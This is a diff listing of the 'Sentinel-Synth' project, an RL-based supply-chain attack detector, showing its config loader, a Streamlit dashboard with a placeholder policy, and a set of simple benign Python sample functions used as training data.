J --> K[11. README.md]
|
| 277 |
+
```
|
requirements.txt
ADDED
|
@@ -0,0 +1,15 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
gymnasium>=0.29.0
|
| 2 |
+
docker>=7.0.0
|
| 3 |
+
streamlit>=1.30.0
|
| 4 |
+
unsloth>=2024.0
|
| 5 |
+
trl>=0.7.0
|
| 6 |
+
transformers>=4.38.0
|
| 7 |
+
torch>=2.1.0
|
| 8 |
+
wandb>=0.16.0
|
| 9 |
+
pytest>=8.0.0
|
| 10 |
+
peft>=0.8.0
|
| 11 |
+
datasets>=2.16.0
|
| 12 |
+
python-dotenv>=1.0.0
|
| 13 |
+
PyYAML>=6.0
|
| 14 |
+
synthetic-data-kit>=0.1.0
|
| 15 |
+
vllm-python-client>=0.1.0
|
sentinel_synth/__init__.py
ADDED
|
File without changes
|
sentinel_synth/config.py
ADDED
|
@@ -0,0 +1,80 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
Centralized configuration loader for Sentinel-Synth.
|
| 3 |
+
|
| 4 |
+
Loads:
|
| 5 |
+
- .env → ENV dict (model names, API keys, secrets)
|
| 6 |
+
- config.yaml → CFG dict (training hyperparameters, paths)
|
| 7 |
+
|
| 8 |
+
Usage:
|
| 9 |
+
from sentinel_synth.config import ENV, CFG
|
| 10 |
+
"""
|
| 11 |
+
|
| 12 |
+
import os
|
| 13 |
+
import yaml
|
| 14 |
+
from pathlib import Path
|
| 15 |
+
|
| 16 |
+
# ---------- .env loading (no external dependency) ----------
|
| 17 |
+
def _load_dotenv(path: str) -> dict:
    """Parse a ``.env`` file into a dict and mirror its values into ``os.environ``.

    Minimal parser — avoids requiring python-dotenv at import time.

    Supported syntax, one entry per line:

    * ``KEY=value`` (whitespace around key and value is ignored)
    * ``export KEY=value`` (the shell ``export`` prefix is dropped)
    * ``KEY="value"`` / ``KEY='value'`` (one pair of matching quotes is removed)
    * blank lines and lines starting with ``#`` are skipped

    Lines without ``=`` or with an empty key are ignored rather than raising.

    Args:
        path: Location of the ``.env`` file.

    Returns:
        Mapping of every parsed key to its value (possibly the empty string).
        An empty dict when ``path`` is not an existing file.
    """
    env = {}
    if not os.path.isfile(path):
        return env

    # Read as UTF-8 explicitly so parsing does not depend on the host locale.
    with open(path, encoding="utf-8") as f:
        for raw_line in f:
            line = raw_line.strip()
            if not line or line.startswith("#"):
                continue

            # Allow files that are also meant to be sourced by a shell.
            if line.startswith("export "):
                line = line[len("export "):].lstrip()

            key, sep, value = line.partition("=")
            key = key.strip()
            if not sep or not key:
                # Not a KEY=VALUE pair; an empty key would also be rejected
                # by os.environ, so skip it instead of crashing at import.
                continue

            value = value.strip()
            # Strip one pair of matching surrounding quotes: KEY="v" -> v
            if len(value) >= 2 and value[0] == value[-1] and value[0] in "\"'":
                value = value[1:-1]

            env[key] = value
            # Also set in os.environ so downstream libs (wandb) pick it up.
            # setdefault keeps any value already exported by the real
            # environment; empty values are never exported.
            if value:
                os.environ.setdefault(key, value)
    return env
|
| 36 |
+
|
| 37 |
+
# Project root: the directory holding the ``sentinel_synth`` package, i.e. the
# parent of the directory this file lives in.
_PROJECT_ROOT = Path(__file__).resolve().parents[1]
_dotenv_raw = _load_dotenv(str(_PROJECT_ROOT / ".env"))

# Built-in fallback for each setting, used when the key is found in neither
# the process environment nor the .env file.
_ENV_DEFAULTS = {
    "SYNTH_GENERATOR_MODEL": "meta-llama/Llama-3.2-3B-Instruct",
    "GRPO_POLICY_MODEL": "unsloth/Qwen2.5-Coder-7B-Instruct",
    "WANDB_API_KEY": "",
    "WANDB_PROJECT": "sentinel-synth",
    "WANDB_RUN_NAME": "grpo-qwen-coder-7b",
}

# Lookup order per key: process environment, then .env, then the fallback.
ENV = {
    name: os.getenv(name, _dotenv_raw.get(name, fallback))
    for name, fallback in _ENV_DEFAULTS.items()
}
|
| 48 |
+
|
| 49 |
+
# ---------- config.yaml loading ----------
# Defaults for every section. They are used as-is when config.yaml is missing
# or empty, and fill in any key that config.yaml leaves out.
_DEFAULT_CFG = {
    "data_generation": {
        "num_samples": 10,
        "output_format": "json",
        "benign_dir": "sentinel_synth/data/benign/",
        "scenarios_output": "sentinel_synth/data/scenarios.json",
        "sdk_config": "sentinel_synth/data/sdk_config.yaml",
    },
    "training": {
        "learning_rate": 1e-6,
        "group_size": 4,
        "max_seq_len": 1024,
        "max_steps": 100,
        "gradient_accumulation_steps": 4,
        "ppo_clip_eps": 0.2,
        "lora_r": 16,
        "lora_alpha": 16,
        "lora_dropout": 0,
        "output_dir": "grpo_lora",
    },
    "environment": {
        "max_steps": 5,
        "use_docker": False,
        "sandbox_timeout_sec": 5,
    },
}


def _load_cfg(config_path):
    """Return the effective configuration for ``config_path``.

    Starts from a copy of ``_DEFAULT_CFG`` and overlays the YAML file on top,
    section by section, so a partial config.yaml only overrides the keys it
    actually sets.

    Args:
        config_path: ``pathlib.Path`` of the YAML file; it may not exist.

    Returns:
        A dict of sections. The defaults alone when the file is missing,
        empty, or does not contain a top-level mapping.
    """
    # Copy each section so later updates never mutate _DEFAULT_CFG.
    cfg = {section: dict(values) for section, values in _DEFAULT_CFG.items()}
    if not config_path.exists():
        return cfg

    with open(config_path, encoding="utf-8") as f:
        loaded = yaml.safe_load(f)

    # safe_load yields None for an empty document; anything that is not a
    # mapping cannot be indexed by section name, so keep the defaults.
    if not isinstance(loaded, dict):
        return cfg

    for section, values in loaded.items():
        if isinstance(values, dict) and isinstance(cfg.get(section), dict):
            cfg[section].update(values)
        else:
            # Unknown section or non-mapping value: take it verbatim.
            cfg[section] = values
    return cfg


_config_path = _PROJECT_ROOT / "config.yaml"
CFG = _load_cfg(_config_path)
|
sentinel_synth/dashboard/__init__.py
ADDED
|
File without changes
|
sentinel_synth/dashboard/app.py
ADDED
|
@@ -0,0 +1,169 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
import streamlit as st
|
| 2 |
+
import json
|
| 3 |
+
import time
|
| 4 |
+
|
| 5 |
+
from sentinel_synth.envs.sentinel_env import SentinelEnv
|
| 6 |
+
|
| 7 |
+
# Page-level settings; Streamlit expects this call before other st.* output.
st.set_page_config(
    page_title="Sentinel-Synth Dashboard",
    page_icon="🛡️",
    layout="wide",
    initial_sidebar_state="expanded",
)

# Custom CSS for Cobalt Blue theming and dark mode.
# The ``.css-*`` selectors are generated class names tied to one Streamlit
# build, so the sidebar rule also targets the ``data-testid`` attribute,
# which does not depend on the generated hash.
st.markdown("""
<style>
    :root {
        --cobalt-blue: #0047AB;
        --cobalt-light: #2A6DC9;
        --cobalt-dark: #002255;
    }
    .stApp {
        background-color: #0d1117;
        color: #c9d1d9;
    }
    .css-1d391kg {
        background-color: #161b22;
    }
    /* Headers */
    h1, h2, h3 {
        color: #58a6ff !important;
    }
    /* Sidebar */
    .css-1lcbmhc,
    [data-testid="stSidebar"] {
        background-color: #161b22;
    }
    /* Buttons */
    .stButton>button {
        background-color: var(--cobalt-blue);
        color: white;
        border: none;
        border-radius: 4px;
        transition: 0.3s;
    }
    .stButton>button:hover {
        background-color: var(--cobalt-light);
        border: none;
        color: white;
    }
    /* Info box */
    .info-box {
        background-color: #1c2128;
        border-left: 4px solid var(--cobalt-blue);
        padding: 1rem;
        border-radius: 0.25rem;
        margin-bottom: 1rem;
    }

    .status-malicious { color: #ff7b72; font-weight: bold; }
    .status-benign { color: #3fb950; font-weight: bold; }
    .status-patched { color: #79c0ff; font-weight: bold; }
</style>
""", unsafe_allow_html=True)
|
| 64 |
+
|
| 65 |
+
@st.cache_resource
def get_env():
    """Create the SentinelEnv used by the dashboard, with the Docker sandbox off.

    The ``st.cache_resource`` decorator makes Streamlit reuse the returned
    object instead of rebuilding it on every script rerun.
    """
    environment = SentinelEnv(use_docker=False)
    return environment
|
| 68 |
+
|
| 69 |
+
def _load_example(env, label):
    """Put the first scenario whose label equals ``label`` into the session state."""
    example = next((s for s in env.scenarios if s["label"] == label), None)
    if example is not None:
        st.session_state["code"] = example["code_snippet"]
        st.session_state["scenario"] = example


def main():
    """Render the dashboard and, on request, run one scripted episode.

    The page offers a demo mode (pre-built malicious/benign snippets) and a
    custom-code mode. Pressing the analyze button resets the environment with
    the selected scenario, applies a threshold-based placeholder policy, and
    shows the chosen action, the reward and the step ``info`` in three tabs.
    """
    st.title("🛡️ Sentinel-Synth | GRPO DevSecOps Agent")
    st.markdown("Supply-chain attack detection and auto-patching platform via Reinforcement Learning.")

    env = get_env()

    with st.sidebar:
        st.header("Control Panel")
        mode = st.radio("Mode", ["Demo Scenarios", "Custom Code"])
        run_docker = st.checkbox("Use Docker Sandbox", value=False)
        st.markdown("---")
        st.markdown("**W&B Run:** [View Logs](https://wandb.ai)")
        st.markdown("**LLM Adapter:** `grpo_lora_qwen`")

    # NOTE(review): get_env() is wrapped in st.cache_resource, so this flag is
    # written onto the cached environment object - confirm that sharing the
    # setting between sessions is intended.
    env.use_docker = run_docker

    if mode == "Demo Scenarios":
        col1, col2 = st.columns([1, 1])
        with col1:
            if st.button("Load Malicious Example"):
                _load_example(env, "malicious")
        with col2:
            if st.button("Load Benign Example"):
                _load_example(env, "benign")

    code_input = st.text_area("Python Code Snippet", value=st.session_state.get("code", ""), height=300)

    # Nothing below runs until the user asks for an analysis.
    if not st.button("Analyze & Defuse"):
        return
    if not code_input:
        st.warning("Please provide code to analyze.")
        return

    # Fall back to an ad-hoc scenario when the text no longer matches the
    # loaded demo example (or when the user is in custom mode).
    scenario = st.session_state.get("scenario")
    if mode == "Custom Code" or not scenario or scenario["code_snippet"] != code_input:
        scenario = {
            "id": "custom",
            "label": "unknown",
            "type": "custom",
            "code_snippet": code_input,
            "patch": None,
        }

    with st.spinner("Agent computing actions in OpenEnv..."):
        obs, _ = env.reset(options={"scenario": scenario})

        # Dummy policy for UI demonstration since we don't load the real adapter here yet
        time.sleep(1)
        risk = obs["risk_score"][0]
        action = env.ACTION_SUBMIT_PATCH if risk > 0.4 and scenario.get("patch") else env.ACTION_ANALYZE

        # An ANALYZE step is followed by a final decision; only the final
        # step's reward and info are reported.
        if action == env.ACTION_ANALYZE:
            env.step(action)
            action = env.ACTION_BLOCK_PR if risk > 0.6 else env.ACTION_REQUEST_REVIEW

        _, reward, _, _, info = env.step(action)

    st.subheader("Agent Report")

    c1, c2, c3 = st.columns(3)
    c1.metric("Component Risk Score", f"{risk:.2f}", delta_color="inverse", delta=f"{risk-0.2:.2f}")
    # Indexed by the integer action id; assumes the env numbers its actions
    # in this order - TODO confirm against SentinelEnv.
    action_names = ["ANALYZE", "SANDBOX", "BLOCK", "PATCH", "REVIEW"]
    c2.metric("Agent Action Taken", action_names[action])
    c3.metric("Reward Received", f"{reward:+.2f}")

    # Display tabs for detailed results
    tab1, tab2, tab3 = st.tabs(["Action Details", "Sandbox Telemetry", "Patch Proposal"])

    with tab1:
        if action == env.ACTION_BLOCK_PR:
            st.markdown("<div class='info-box status-malicious'>Action: BLOCKED. Vulnerability detected and no patch available.</div>", unsafe_allow_html=True)
        elif action == env.ACTION_SUBMIT_PATCH:
            st.markdown("<div class='info-box status-patched'>Action: PATCH SUBMITTED. Vulnerability neutralized.</div>", unsafe_allow_html=True)
            st.json(info)
        else:
            st.markdown("<div class='info-box status-benign'>Action: REVIEW / ANALYZE. Code appears nominally safe or requires human review.</div>", unsafe_allow_html=True)

    with tab2:
        st.markdown("**(Telemetry simulates background execution for static code)**")
        if "telemetry" in info:
            st.json(info["telemetry"])
        else:
            st.info("No sandbox execution triggered for this path.")

    with tab3:
        if action == env.ACTION_SUBMIT_PATCH and scenario.get("patch"):
            st.code(scenario["patch"], language='python')
            if info.get("validation_success"):
                st.success("Patch passed 3-stage validation pipeline!")
        else:
            st.info("No patch generated.")
|
| 167 |
+
|
| 168 |
+
if __name__ == "__main__":
|
| 169 |
+
main()
|
sentinel_synth/data/__init__.py
ADDED
|
File without changes
|
sentinel_synth/data/benign/ds_binarysearch.py
ADDED
|
@@ -0,0 +1,13 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
def binary_search(arr, target):
    """Return an index of ``target`` in the sorted sequence ``arr``, or -1 if absent."""
    left, right = 0, len(arr) - 1
    while left <= right:
        middle = (left + right) // 2
        candidate = arr[middle]
        if candidate == target:
            return middle
        if candidate < target:
            # Target can only be in the upper half.
            left = middle + 1
        else:
            right = middle - 1
    return -1
|
sentinel_synth/data/benign/ds_linkedlist.py
ADDED
|
@@ -0,0 +1,19 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
class Node:
    """One element of a linked list: a payload and a reference to the next node."""

    def __init__(self, data):
        self.next = None
        self.data = data


class LinkedList:
    """Singly linked list that supports appending at the tail."""

    def __init__(self):
        self.head = None

    def append(self, data):
        """Attach a new node holding ``data`` after the current last node."""
        node = Node(data)
        if not self.head:
            # Empty list: the new node becomes the head.
            self.head = node
        else:
            tail = self.head
            while tail.next:
                tail = tail.next
            tail.next = node
|
sentinel_synth/data/benign/ds_queue.py
ADDED
|
@@ -0,0 +1,15 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
class Queue:
    """First-in, first-out queue backed by a Python list."""

    def __init__(self):
        self.items = []

    def enqueue(self, item):
        """Add ``item`` at the back of the queue (index 0 of ``items``)."""
        self.items.insert(0, item)

    def dequeue(self):
        """Remove and return the oldest item, or None when the queue is empty."""
        if self.is_empty():
            return None
        return self.items.pop()

    def is_empty(self):
        """Return True when the queue holds no items."""
        return not self.items
|
sentinel_synth/data/benign/ds_sorting.py
ADDED
|
@@ -0,0 +1,8 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
def bubble_sort(arr):
    """Sort ``arr`` in place in ascending order using bubble sort and return it.

    Stops as soon as a full pass makes no swap, so an already sorted list
    costs a single pass.
    """
    n = len(arr)
    for i in range(n - 1):
        swapped = False
        # After pass i the last i elements are already in their final place.
        for j in range(n - i - 1):
            if arr[j] > arr[j + 1]:
                arr[j], arr[j + 1] = arr[j + 1], arr[j]
                swapped = True
        if not swapped:
            break
    return arr
|
sentinel_synth/data/benign/ds_stack.py
ADDED
|
@@ -0,0 +1,15 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
class Stack:
    """Last-in, first-out stack backed by a Python list."""

    def __init__(self):
        self.items = []

    def push(self, item):
        """Place ``item`` on top of the stack."""
        self.items.append(item)

    def pop(self):
        """Remove and return the top item, or None when the stack is empty."""
        if self.is_empty():
            return None
        return self.items.pop()

    def is_empty(self):
        """Return True when the stack holds no items."""
        return not self.items
|
sentinel_synth/data/benign/io_config.py
ADDED
|
@@ -0,0 +1,15 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
def read_ini_config(content):
    """Parse simple INI text into ``{section: {key: value}}``.

    Blank lines and lines starting with ``#`` or ``;`` are ignored. A
    ``[section]`` header opens a section; repeating a header keeps the keys
    already collected for it. ``key = value`` lines before the first header
    are ignored. Keys and values are stripped strings.
    """
    config = {}
    current_section = None
    for line in content.splitlines():
        line = line.strip()
        if not line or line.startswith(('#', ';')):
            continue
        if line.startswith('[') and line.endswith(']'):
            current_section = line[1:-1]
            # setdefault keeps earlier keys when a section appears twice.
            config.setdefault(current_section, {})
        elif '=' in line and current_section is not None:
            key, val = line.split('=', 1)
            config[current_section][key.strip()] = val.strip()
    return config
|
sentinel_synth/data/benign/io_csv.py
ADDED
|
@@ -0,0 +1,11 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
def parse_csv(csv_content):
    """Parse simple comma-separated text into a list of row dictionaries.

    The first line supplies the column names; each later line becomes a
    dict keyed by those names. Both ``\\n`` and ``\\r\\n`` line endings are
    accepted. Quoted fields are not interpreted. Empty or whitespace-only
    input returns an empty list.
    """
    lines = csv_content.strip().splitlines()
    if not lines:
        return []
    headers = lines[0].split(',')
    return [dict(zip(headers, line.split(','))) for line in lines[1:]]
|
sentinel_synth/data/benign/io_json.py
ADDED
|
@@ -0,0 +1,5 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
import json
|
| 2 |
+
|
| 3 |
+
def format_json(obj):
    """Serialize ``obj`` to JSON text with 4-space indentation and sorted keys."""
    options = {"indent": 4, "sort_keys": True}
    return json.dumps(obj, **options)
|
sentinel_synth/data/benign/io_log.py
ADDED
|
@@ -0,0 +1,8 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
def parse_logs(log_lines):
    """Split ``level - message`` log lines into dictionaries.

    Lines without the `` - `` separator are skipped. Square brackets around
    the level are removed.
    """
    entries = []
    for raw in log_lines:
        level, separator, message = raw.partition(' - ')
        if separator:
            entries.append({"level": level.strip('[]'), "message": message})
    return entries
|
sentinel_synth/data/benign/io_template.py
ADDED
|
@@ -0,0 +1,6 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
def render_template(template, context):
    """Replace every ``{{key}}`` placeholder in ``template`` with ``str(context[key])``."""
    rendered = template
    for name in context:
        placeholder = f"{{{{{name}}}}}"
        rendered = rendered.replace(placeholder, str(context[name]))
    return rendered
|
sentinel_synth/data/benign/math_factorial.py
ADDED
|
@@ -0,0 +1,5 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
def factorial(n):
    """Return ``n!`` for a non-negative whole number ``n``.

    Computed iteratively, so large ``n`` does not hit the recursion limit.

    Raises:
        ValueError: if ``n`` is negative or not a whole number.
    """
    if n < 0 or n != int(n):
        raise ValueError("factorial() is only defined for non-negative whole numbers")
    result = 1
    while n > 1:
        result *= n
        n -= 1
    return result
|
sentinel_synth/data/benign/math_fibonacci.py
ADDED
|
@@ -0,0 +1,7 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
def fibonacci(n):
    """Return the nth Fibonacci number (F(0) = 0, F(1) = 1).

    Any ``n <= 0`` yields 0. Runs in linear time, replacing the exponential
    double recursion.
    """
    if n <= 0:
        return 0
    previous, current = 0, 1
    for _ in range(n - 1):
        previous, current = current, previous + current
    return current
|
sentinel_synth/data/benign/math_gcd.py
ADDED
|
@@ -0,0 +1,5 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
def gcd(a, b):
    """Return the greatest common divisor of ``a`` and ``b`` (Euclid's algorithm).

    The result is never negative, whatever the signs of the operands;
    ``gcd(0, 0)`` is 0.
    """
    while b:
        a, b = b, a % b
    # Python's % takes the divisor's sign, so the loop can end on a negative value.
    return abs(a)
|
sentinel_synth/data/benign/math_matrix.py
ADDED
|
@@ -0,0 +1,3 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
def matrix_addition(mat1, mat2):
    """Return the element-wise sum of two matrices given as lists of rows.

    The shape is taken from ``mat1``: its row count and the length of its
    first row.
    """
    total = []
    for row in range(len(mat1)):
        width = len(mat1[0])
        total.append([mat1[row][col] + mat2[row][col] for col in range(width)])
    return total
|
sentinel_synth/data/benign/math_prime.py
ADDED
|
@@ -0,0 +1,8 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
def is_prime(n):
    """Return True when the integer ``n`` is prime.

    Uses the exact integer square root as the trial-division bound, so
    arbitrarily large integers neither overflow nor lose precision.
    """
    import math

    if n <= 1:
        return False
    if n < 4:
        # 2 and 3 are prime.
        return True
    if n % 2 == 0:
        return False
    # Only odd divisors up to sqrt(n) need checking.
    for divisor in range(3, math.isqrt(n) + 1, 2):
        if n % divisor == 0:
            return False
    return True
|
sentinel_synth/data/benign/misc_calc.py
ADDED
|
@@ -0,0 +1,13 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
def basic_calculator(a, b, op):
    """Apply the operator ``op`` ('+', '-', '*' or '/') to ``a`` and ``b``.

    Returns None for any other operator.

    Raises:
        ValueError: when dividing by zero.
    """
    if op == '+':
        return a + b
    if op == '-':
        return a - b
    if op == '*':
        return a * b
    if op != '/':
        return None
    if b == 0:
        raise ValueError("Division by zero")
    return a / b
|
sentinel_synth/data/benign/misc_date.py
ADDED
|
@@ -0,0 +1,3 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
def format_iso_date(year, month, day):
    """Return ``YYYY-MM-DD`` built from integer components, zero-padded."""
    parts = (f"{year:04d}", f"{month:02d}", f"{day:02d}")
    return "-".join(parts)
|
sentinel_synth/data/benign/misc_password.py
ADDED
|
@@ -0,0 +1,8 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
def is_strong_password(pwd):
    """Return True when ``pwd`` has at least 8 characters and contains an
    uppercase letter, a lowercase letter and a digit."""
    if len(pwd) < 8:
        return False
    required = (str.isupper, str.islower, str.isdigit)
    return all(any(check(ch) for ch in pwd) for check in required)
|
sentinel_synth/data/benign/misc_temp.py
ADDED
|
@@ -0,0 +1,7 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
def celsius_to_fahrenheit(c):
    """Return the Fahrenheit equivalent of a Celsius temperature."""
    scaled = c * 9 / 5
    return scaled + 32
|
| 4 |
+
|
| 5 |
+
def fahrenheit_to_celsius(f):
    """Return the Celsius equivalent of a Fahrenheit temperature."""
    offset = f - 32
    return offset * 5 / 9
|
sentinel_synth/data/benign/misc_url.py
ADDED
|
@@ -0,0 +1,11 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
def parse_url_params(url):
    """Return the query parameters of ``url`` as a ``{name: value}`` dict.

    The ``#fragment`` is dropped before the query is located, so it can
    neither leak into the last value nor be mistaken for a query. Pairs
    without ``=`` are skipped. A repeated name keeps its last value. Values
    are returned as written (no percent-decoding).
    """
    without_fragment = url.split('#', 1)[0]
    if '?' not in without_fragment:
        return {}
    query = without_fragment.split('?', 1)[1]
    params = {}
    for pair in query.split('&'):
        if '=' in pair:
            name, value = pair.split('=', 1)
            params[name] = value
    return params
|
sentinel_synth/data/benign/str_anagram.py
ADDED
|
@@ -0,0 +1,3 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
def is_anagram(s1, s2):
    """Return True when the two strings use the same letters, ignoring spaces and case."""

    def letters(text):
        # Canonical form: spaces removed, lowercased, characters sorted.
        return sorted(text.replace(" ", "").lower())

    return letters(s1) == letters(s2)
|
sentinel_synth/data/benign/str_caesar.py
ADDED
|
@@ -0,0 +1,10 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
def caesar_cipher(text, shift):
    """Shift every ASCII letter in ``text`` by ``shift`` places, wrapping within the alphabet.

    Case is preserved. Every other character, including accented and other
    non-ASCII letters, is copied unchanged. A negative ``shift`` reverses a
    positive one.
    """
    shifted = []
    for char in text:
        if 'a' <= char <= 'z':
            base = ord('a')
        elif 'A' <= char <= 'Z':
            base = ord('A')
        else:
            # Not an ASCII letter: rotating it would produce an unrelated character.
            shifted.append(char)
            continue
        shifted.append(chr((ord(char) - base + shift) % 26 + base))
    return "".join(shifted)
|
sentinel_synth/data/benign/str_palindrome.py
ADDED
|
@@ -0,0 +1,4 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
def is_palindrome(s):
    """Return True when ``s`` reads the same both ways, ignoring case and non-alphanumeric characters."""
    kept = filter(str.isalnum, s)
    cleaned = ''.join(map(str.lower, kept))
    return cleaned == ''.join(reversed(cleaned))
|
sentinel_synth/data/benign/str_slug.py
ADDED
|
@@ -0,0 +1,6 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
def generate_slug(title):
    """Turn ``title`` into a lowercase, hyphen-separated URL slug.

    Characters other than a-z, 0-9, whitespace and hyphens are removed.
    Runs of whitespace and hyphens collapse to one hyphen, and leading or
    trailing hyphens are trimmed.
    """
    import re

    lowered = title.lower()
    stripped = re.sub(r'[^a-z0-9\s-]', '', lowered)
    hyphenated = re.sub(r'[\s-]+', '-', stripped)
    return hyphenated.strip('-')
|
sentinel_synth/data/benign/str_wordcount.py
ADDED
|
@@ -0,0 +1,7 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
def word_count(text):
    """Return a dict mapping each whitespace-separated word in ``text`` to its count."""
    tally = {}
    for token in text.split():
        if token in tally:
            tally[token] += 1
        else:
            tally[token] = 1
    return tally
|
sentinel_synth/data/generate_scenarios.py
ADDED
|
@@ -0,0 +1,253 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
